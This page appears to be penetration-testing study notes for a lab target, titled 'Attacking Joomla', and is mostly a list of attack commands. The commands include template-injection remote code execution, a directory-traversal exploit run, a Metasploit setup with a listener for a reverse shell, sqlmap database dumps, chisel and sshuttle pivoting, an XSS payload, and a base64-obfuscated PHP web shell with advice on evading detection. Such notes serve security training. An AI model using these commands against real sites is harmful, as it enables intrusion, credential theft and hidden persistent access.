4.-Attacking-joomla

1. Joomla Admin Panel Code Execution (Template Customization)

curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id

  • Log in to /administrator with admin credentials.

  • Modify template files to inject PHP code for RCE.

  • Use non-standard parameters and clean up web shells.

2. Joomla Core Directory Traversal (CVE-2019-10945)

python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /

  • Exploits directory traversal and file deletion.

  • Useful if admin panel is inaccessible from outside.

  • Can reveal sensitive files like configuration.php.

3. Joomla Configuration File Exploitation (Manual, if accessible)

curl -s http://dev.inlanefreight.local/configuration.php

  • Check for exposed configuration.php file.

  • Extract database credentials and sensitive information.

4. Joomla Extension Exploitation (Manual)

curl -s http://dev.inlanefreight.local/components/[vulnerable_component]/[exploit_path]?param=[malicious_payload]

  • Enumerate extensions and research vulnerabilities.

  • Craft exploits based on identified flaws.

  • Extensions are a very common attack vector.

5. Metasploit Joomla Modules (if applicable)

msf6 > search joomla
msf6 > use exploit/unix/webapp/joomla_...
msf6 > set RHOSTS dev.inlanefreight.local
msf6 > set RPORT 80
msf6 > set TARGETURI /administrator/
msf6 > set USERNAME admin
msf6 > set PASSWORD admin
msf6 > set LHOST [your_ip]
msf6 > set LPORT 4444
msf6 > exploit

  • Use Metasploit for automated exploitation.

  • Streamlines the process for known vulnerabilities.

6. Database Exploitation (if SQL injection is achieved)

sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" --dbs --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] --tables --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch

  • Use SQLMap or manual techniques to dump the database.

  • Extract credentials and sensitive information.

7. Post-Exploitation (Privilege Escalation, Lateral Movement)

  • Linux: linpeas.sh

  • Windows: winpeas.exe

  • Pivoting:

chisel server -p 1080 --reverse & chisel client [target_ip]:1080 R:socks
sshuttle -r user@target_ip 0.0.0.0/0

  • Enumerate the compromised system.

  • Use as a pivot point for lateral movement.

8. Joomla Rest API Attacks

curl -s http://dev.inlanefreight.local/api/index.php/v1/users

  • Attack the Joomla REST API if enabled.

  • Enumerate users, or modify content.

9. Advanced Web Shell Techniques

php -r '$s="c3lzdGVtKCRfR0VUWyJjbWQiXSk7";eval(base64_decode($s));' > shell.php

  • Obfuscate web shells to evade detection.

  • Implement authentication mechanisms.

10. Client-Side Attacks (XSS)

curl "http://dev.inlanefreight.local/index.php?param=<script>alert(1)</script>"

  • Test for XSS vulnerabilities.

  • Attack the users of the web site.

11. Joomla CLI (if accessible)

joomla user:list

  • If you have shell access, you can use the Joomla CLI.

Important Things:

  • Extension Vulnerabilities: Prioritize extension enumeration and testing.

  • Configuration Exposure: Check for and protect configuration.php.

  • Web Shell Security: Use obfuscation and cleanup.

  • Reporting: Document all findings and actions.

  • Stay Updated: Keep up with Joomla security advisories.

Previous3.-Joomla-discovery-and-enumerationNext5.-Drupal-discovery-and-enumeration

Last updated